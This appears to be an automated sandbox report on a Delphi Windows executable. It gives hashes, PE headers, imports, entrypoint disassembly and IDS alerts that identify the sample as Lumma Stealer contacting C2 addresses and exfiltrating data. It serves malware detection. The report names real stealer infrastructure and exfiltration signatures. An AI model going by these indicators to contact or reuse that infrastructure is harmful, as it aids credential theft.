                                                                                                                                                                                                                            File size:2'097'152 bytes
                                                                                                                                                                                                                            MD5:d781fd542a1dcb91c07c192bcac16f8e
                                                                                                                                                                                                                            SHA1:86ba60cac73d2f28120d452783622e7844e427f0
                                                                                                                                                                                                                            SHA256:7d28c7b252fb0b95ea0b5f305e5bb4e781773a9a8582a7cf1076650677263ef0
                                                                                                                                                                                                                            SHA512:0ddbbd3adee993b4cd0a9504febc7b64b72213dc49ffe70b80014a99ba317c0b16c78c2815333ccb1f5c218da27748869fb989fbed4bae4a5a23bce8dc847d5b
                                                                                                                                                                                                                            SSDEEP:49152:kuGsknvHDK8YcrWaCyqp1uw/0L5HiwSX1W//Jg:/GsknvHe8Yzacp50LpSX1W//Jg
                                                                                                                                                                                                                            TLSH:37A59DA2FB4388B3F227263D1D4AD794552E7F115FF0648B3BF84A4C0BB561139252AB
                                                                                                                                                                                                                            Icon Hash:3e5fcdce1f0c2813
                                                                                                                                                                                                                            Entrypoint:0x52859c
                                                                                                                                                                                                                            Entrypoint Section:CODE
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:ba8c1dbdc3c38ecddecbc436d980538f
                                                                                                                                                                                                                            Signature Valid:
                                                                                                                                                                                                                            Signature Issuer:
                                                                                                                                                                                                                            Signature Validation Error:
                                                                                                                                                                                                                            Error Number:
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                Version:
                                                                                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                                                                                Serial:
                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                                                                                                                mov eax, 00528184h
                                                                                                                                                                                                                                call 00007F1EA46DE041h
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                call 00007F1EA474444Dh
                                                                                                                                                                                                                                mov ecx, dword ptr [0052C1D8h]
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                mov edx, dword ptr [005263B0h]
                                                                                                                                                                                                                                call 00007F1EA474444Dh
                                                                                                                                                                                                                                mov ecx, dword ptr [0052C15Ch]
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                mov edx, dword ptr [00525E40h]
                                                                                                                                                                                                                                call 00007F1EA4744435h
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                call 00007F1EA47444A9h
                                                                                                                                                                                                                                call 00007F1EA46DB8D8h
                                                                                                                                                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12f000 | 0x295e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14f000 | 0xb8000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1ae200 | 0x2118 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x134000 | 0x1a13c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x133000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x1275fc | 0x127600 | 27895dc7cfed60c02965a018dea8e393 | False | 0.45191989790520526 | data | 6.565736518746283 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x129000 | 0x36c0 | 0x3800 | f15602958cfed3b9c1fa839de845894e | False | 0.35498046875 | data | 4.044626185990053 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x12d000 | 0x1d21 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x12f000 | 0x295e | 0x2a00 | 7d48f980de0ab1b669d230f1aad47239 | False | 0.3625372023809524 | data | 5.0281993778896545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x132000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x133000 | 0x18 | 0x200 | b90be1293225713fd61560e123c5aa47 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "S" | 0.2069200177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x134000 | 0x1a13c | 0x1a200 | c839772e1a25c7cda4d2220521452f23 | False | 0.39902624102870815 | data | 6.531022351368505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x14f000 | 0xb8000 | 0xb8000 | 69373147e9c6f8f4d0346c863698e9a8 | False | 0.5736163595448369 | data | 7.41063875303202 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0x14fe4c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635 |
| RT_CURSOR | 0x14ff80 | 0x134 | data | | | 0.4642857142857143 |
| RT_CURSOR | 0x1500b4 | 0x134 | data | | | 0.4805194805194805 |
| RT_CURSOR | 0x1501e8 | 0x134 | data | | | 0.38311688311688313 |
| RT_CURSOR | 0x15031c | 0x134 | data | | | 0.36038961038961037 |
| RT_CURSOR | 0x150450 | 0x134 | data | | | 0.4090909090909091 |
| RT_CURSOR | 0x150584 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468 |
| RT_BITMAP | 0x1506b8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0x150888 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125 |
| RT_BITMAP | 0x150a6c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0x150c3c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414 |
| RT_BITMAP | 0x150e0c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414 |
| RT_BITMAP | 0x150fdc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931 |
| RT_BITMAP | 0x1511ac | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793 |
| RT_BITMAP | 0x15137c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0x15154c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896 |
| RT_BITMAP | 0x15171c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0x1518ec | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414 |
| RT_ICON | 0x1519d4 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | Chinese | China | 0.2980894357033006 |
| RT_ICON | 0x1621fc | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | Chinese | China | 0.43776570618800187 |
| RT_ICON | 0x166424 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Chinese | China | 0.5142116182572614 |
| RT_ICON | 0x1689cc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Chinese | China | 0.5811444652908068 |
| RT_ICON | 0x169a74 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Chinese | China | 0.6598360655737705 |
| RT_ICON | 0x16a3fc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Chinese | China | 0.749113475177305 |
| RT_DIALOG | 0x16a864 | 0x52 | data | | | 0.7682926829268293 |
| RT_STRING | 0x16a8b8 | 0xe4 | data | | | 0.5789473684210527 |
| RT_STRING | 0x16a99c | 0x1e4 | data | | | 0.38016528925619836 |
| RT_STRING | 0x16ab80 | 0x1a4 | data | | | 0.4714285714285714 |
| RT_STRING | 0x16ad24 | 0x11c | data | | | 0.5880281690140845 |
| RT_STRING | 0x16ae40 | 0x38c | data | | | 0.4251101321585903 |
| RT_STRING | 0x16b1cc | 0xc4 | data | | | 0.6071428571428571 |
| RT_STRING | 0x16b290 | 0xec | data | | | 0.597457627118644 |
| RT_STRING | 0x16b37c | 0x130 | data | | | 0.5625 |
| RT_STRING | 0x16b4ac | 0x3c0 | data | | | 0.4 |
| RT_STRING | 0x16b86c | 0x400 | data | | | 0.3876953125 |
| RT_STRING | 0x16bc6c | 0x314 | data | | | 0.4022842639593909 |
| RT_STRING | 0x16bf80 | 0x334 | data | | | 0.3426829268292683 |
| RT_STRING | 0x16c2b4 | 0x404 | data | | | 0.3754863813229572 |
| RT_STRING | 0x16c6b8 | 0x114 | data | | | 0.5 |
| RT_STRING | 0x16c7cc | 0xe4 | data | | | 0.5482456140350878 |
| RT_STRING | 0x16c8b0 | 0x24c | data | | | 0.477891156462585 |
| RT_STRING | 0x16cafc | 0x3cc | data | | | 0.30246913580246915 |
| RT_STRING | 0x16cec8 | 0x3ac | data | | | 0.37553191489361704 |
| RT_STRING | 0x16d274 | 0x2d4 | data | | | 0.4046961325966851 |
| RT_RCDATA | 0x16d548 | 0x242bf | Delphi compiled form 'TvgBackground' | English | United States | 0.2749883571028422 |
| RT_RCDATA | 0x191808 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0x191818 | 0x670 | data | | | 0.6037621359223301 |
| RT_RCDATA | 0x191e88 | 0xa2a | Delphi compiled form 'TfrmAbout' | | | 0.23904688700999233 |
| RT_RCDATA | 0x1928b4 | 0x817 | Delphi compiled form 'TfrmControlBox' | | | 0.3896668276195075 |
| RT_RCDATA | 0x1930cc | 0x1ce81 | Delphi compiled form 'TfrmPlayer' | | | 0.9742231906825112 |
| RT_RCDATA | 0x1aff50 | 0x1809 | Delphi compiled form 'TvgBitmapEditor' | | | 0.3528360149520559 |
| RT_RCDATA | 0x1b175c | 0x3144 | Delphi compiled form 'TvgBrushDesign' | | | 0.20480494766888677 |
| RT_RCDATA | 0x1b48a0 | 0x80e | Delphi compiled form 'TvgPathDataDesigner' | | | 0.4010669253152279 |
| RT_GROUP_CURSOR | 0x1b50b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x1b50c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x1b50d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x1b50ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x1b5100 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x1b5114 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x1b5128 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_ICON | 0x1b513c | 0x5a | data | Chinese | China | 0.7888888888888889 |
| RT_MANIFEST | 0x1b5198 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |

| DLL | Import |
|---|---|
| kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle |
| user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SystemTimeToFileTime, Sleep, SizeofResource, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEnvironmentVariableW, SetEnvironmentVariableA, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, ReleaseMutex, ReadFile, OutputDebugStringA, MulDiv, LockResource, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameW, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameW, GetFullPathNameA, GetFileSize, GetFileAttributesW, GetFileAttributesA, GetExitCodeThread, GetEnvironmentVariableW, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentDirectoryW, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileW, FindFirstFileW, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateMutexA, CreateFileW, CreateFileA, CreateEventA, CompareStringW, CompareStringA, CloseHandle |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt |
| user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, SendDlgItemMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsClipboardFormatAvailable, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRgn, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowExA, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharLowerBuffW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit |
| ole32.dll | ReleaseStgMedium, RevokeDragDrop, RegisterDragDrop, OleInitialize, CoCreateInstance |
| comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls |
| imm32.dll | ImmSetCompositionWindow, ImmSetCompositionFontA, ImmGetCompositionStringW, ImmReleaseContext, ImmGetContext |
| winspool.drv | OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter |
| shell32.dll | DragQueryFileW, DragQueryFileA |
| comdlg32.dll | ChooseFontA, ChooseColorA, GetSaveFileNameA, GetOpenFileNameA |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| Chinese | China | |
| English | United States | |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T19:10:12.312033+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:12.801798+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:12.801798+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:13.288627+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:13.761440+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:13.761440+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:14.567126+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:15.816311+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:17.287015+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:20.610274+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:21.064381+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49741 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:21.807662+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:25.849669+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:28.623498+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:29.102995+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | TCP
2024-12-30T19:10:29.906966+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | TCP
2024-12-30T19:10:30.691182+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49746 | 172.67.208.58 | 443 | TCP
2024-12-30T19:10:31.106563+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 172.67.208.58 | 443 | 192.168.2.4 | 49746 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.450328112 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.450368881 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.450539112 CET49735443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.450557947 CET44349735104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.818451881 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.818502903 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.818574905 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.819500923 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:16.819514990 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.286863089 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.287014961 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.288260937 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.288270950 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.288517952 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.296920061 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.297060966 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.297094107 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.297199011 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:17.297207117 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:19.608825922 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:19.608918905 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:19.609102011 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:19.609273911 CET49739443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:19.609318018 CET44349739104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.128849030 CET49741443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.128886938 CET44349741104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.129055977 CET49741443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.129374027 CET49741443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.129389048 CET44349741104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.610181093 CET44349741104.21.32.1192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.610274076 CET49741443192.168.2.4104.21.32.1
                                                                                                                                                                                                                                Dec 30, 2024 19:10:20.611706018 CET49741443192.168.2.4104.21.32.1
